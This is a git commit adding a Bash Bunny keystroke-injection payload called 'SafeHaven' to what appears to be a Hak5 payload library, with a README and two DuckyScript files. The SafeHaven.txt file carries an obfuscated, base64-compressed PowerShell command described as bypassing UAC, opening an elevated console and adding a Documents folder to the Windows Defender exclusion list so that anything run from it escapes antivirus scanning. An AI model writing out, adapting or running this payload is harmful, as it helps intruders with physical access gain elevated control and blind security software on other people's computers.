New Payload - SafeHaven (#525)

* Add files via upload * Update README.md
2025-10-29 16:58:25 +00:00 · 2022-05-19 13:26:50 -05:00 · 2022-05-19 13:26:50 -05:00 · 145ffc36f6
commit 145ffc36f6
parent 791cc4e1aa
3 changed files with 141 additions and 0 deletions
--- a/payloads/library/execution/-BB-SafeHaven/README.md
+++ b/payloads/library/execution/-BB-SafeHaven/README.md
@ -0,0 +1,97 @@
+![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
+
+<!-- TABLE OF CONTENTS -->
+<details>
+  <summary>Table of Contents</summary>
+  <ol>
+    <li><a href="#Description">Description</a></li>
+    <li><a href="#getting-started">Getting Started</a></li>
+    <li><a href="#Contributing">Contributing</a></li>
+    <li><a href="#Version-History">Version History</a></li>
+    <li><a href="#Contact">Contact</a></li>
+    <li><a href="#Acknowledgments">Acknowledgments</a></li>
+  </ol>
+</details>
+
+# Safe Haven
+
+A script used to open an elevated powershell console and created a folder ignored by the AntiVirus
+
+## Description
+
+This is a UAC bypass payload that will open an elevated powershell console 
+
+Next a Directory called "safe" will be generated in your Documents Directory
+
+The "safe" directory will be added to the Window's Defender Exclusion list
+
+The AntiVirus will ignore all files downloaded to or ran from here
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+### Executing program
+
+* Plug in your device
+* A keystroke injection based payload will run
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Version History
+
+* 0.1
+    * Initial Release
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- CONTACT -->
+## Contact
+
+<div><h2>I am Jakoby</h2></div>
+  <p><br/>
+  
+  <img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50"> 
+  
+  <a href="https://github.com/I-Am-Jakoby/">
+    <img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
+  </a>
+  
+  <a href="https://www.instagram.com/i_am_jakoby/">
+    <img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
+  </a>
+  
+  <a href="https://twitter.com/I_Am_Jakoby/">
+    <img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
+  </a>
+  
+  <a href="https://www.youtube.com/c/IamJakoby/">
+    <img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
+  </a>
+
+  Project Link: (https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-SafeHaven)
+</p>
+
+
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- ACKNOWLEDGMENTS -->
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+<p align="right">(<a href="#top">back to top</a>)</p>
--- a/payloads/library/execution/-BB-SafeHaven/SafeHaven.txt
+++ b/payloads/library/execution/-BB-SafeHaven/SafeHaven.txt
@ -0,0 +1,23 @@
+REM     Title: Safe-Haven
+
+REM     Author: I am Jakoby
+
+REM     Description: This is a UAC bypass payload that will open an elevated powershell console 
+REM     Next a Directory called "safe" will be generated in your Documents Directory
+REM     The "safe" directory will be added to the Window's Defender Exclusion list
+REM     The AntiVirus will ignore all files downloaded to or ran from here
+
+REM     Target: Windows 10, 11
+
+DELAY 500
+GUI r
+DELAY 500
+STRING powershell 
+ENTER
+DELAY 1000
+STRING & ( $PShoME[21]+$psHOME[30]+'x')(NEw-objECt  IO.COMpresSiON.DeflATESTrEAm([sYStEm.io.MeMOrySTreAm] [SYSTEM.CONVERT]::fROMBase64StRing('hZFPT8JAEMW/yqbxWiDqwYRweFvKtipiLRAhvdTusBj6L93qop/eXRKNXvCyyWTe+72Z2YvFXEy8tjHU6T2V5YCOxHzD9sx/aB7dU8fMD49UMP7R5lozn+qC3YIbiBASvMF0hFjhgHCFF8UvMW2wTvjS1SvFE8xiLA0XCA9Ygs8wM3gCf4eYQya8hzj5RojmeAb/dNyt4iWCGAvj+hpb8BZRjBg2JwI2idUL5focIrF99AhHKGDzrG6b8MpxC8cR19gYxwPuE5sfKVdrRLZvLFfcuPzkZx+r+7MfJhNv3JFiuZTMi+6CVZY2u97kHWVBaW9COhs0lcpSd8Fs0VKdFU1V5bX02FCyC3tjNtz9h6i0r6nvX2uls+CtW1N3cnsO7Tn/rpE2oKXOfdI47fOu99OSqGW+ZlcnvKSSejo7pPc9ynnt72lOli8=' ),[SYsTEM.io.cOmpressION.coMPRESsiOnmode]::DEcOMPRESS )| FoREACh-object{NEw-objECt  SySTeM.Io.StreaMreadER( $_ ,[System.teXT.EnCoDINg]::ASCiI) }|foReaCh-objEct {$_.ReAdToEND()} );exit
+ENTER
+
+
+
+
--- a/payloads/library/execution/-BB-SafeHaven/payload.txt
+++ b/payloads/library/execution/-BB-SafeHaven/payload.txt
@ -0,0 +1,21 @@
+REM     Title: UrAttaControl
+
+REM     Author: I am Jakoby
+
+REM     Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
+REM     Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
+
+REM     Target: Windows 10, 11
+
+LED SETUP
+
+GET SWITCH_POSITION
+
+ATTACKMODE HID STORAGE
+
+LED STAGE1
+
+QUACK DELAY 3000
+LED STAGE1
+QUACK ${SWITCH_POSITION}/SafeHaven.txt
+